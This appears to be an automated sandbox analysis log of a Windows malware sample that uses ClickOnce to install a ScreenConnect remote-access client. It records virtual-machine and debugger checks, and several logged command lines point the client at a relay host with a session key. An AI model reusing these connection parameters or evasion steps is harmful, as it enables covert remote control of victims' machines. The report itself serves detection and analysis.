Source: dfsvc.exe, 00000002.00000002.3005354461.0000015F98020000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3012064740.0000015F998BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3395536470.000001EE1B654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3392924823.000001EE1602B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: svchost.exe, 00000007.00000002.3392924823.000001EE1602B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW 3
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Code function: 1_2_0002191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_0002191F

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

1_2_00021000

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Code function: 1_2_00023677 mov eax, dword ptr fs:[00000030h]

1_2_00023677

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Code function: 1_2_00026893 GetProcessHeap,

1_2_00026893

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Process token adjusted: Debug

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Code function: 1_2_00021493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00021493
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Code function: 1_2_0002191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0002191F
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Code function: 1_2_00024573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00024573
Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Code function: 1_2_00021AAC SetUnhandledExceptionFilter,	1_2_00021AAC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.ClientService.dll.2.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3540 -ip 3540	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 724	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\3hg45vn8.twa\pqh5jcrn.mml\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\screenconnect.clientservice.exe" "?e=support&y=guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\3hg45vn8.twa\pqh5jcrn.mml\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\screenconnect.clientservice.exe" "?e=support&y=guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\3hg45vn8.twa\pqh5jcrn.mml\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\screenconnect.clientservice.exe" "?e=support&y=guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"	Jump to behavior

Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Code function: 1_2_00021BD4 cpuid

1_2_00021BD4

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsBackstageShell.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsFileManager.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsFileManager.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Core.dll VolumeInformation
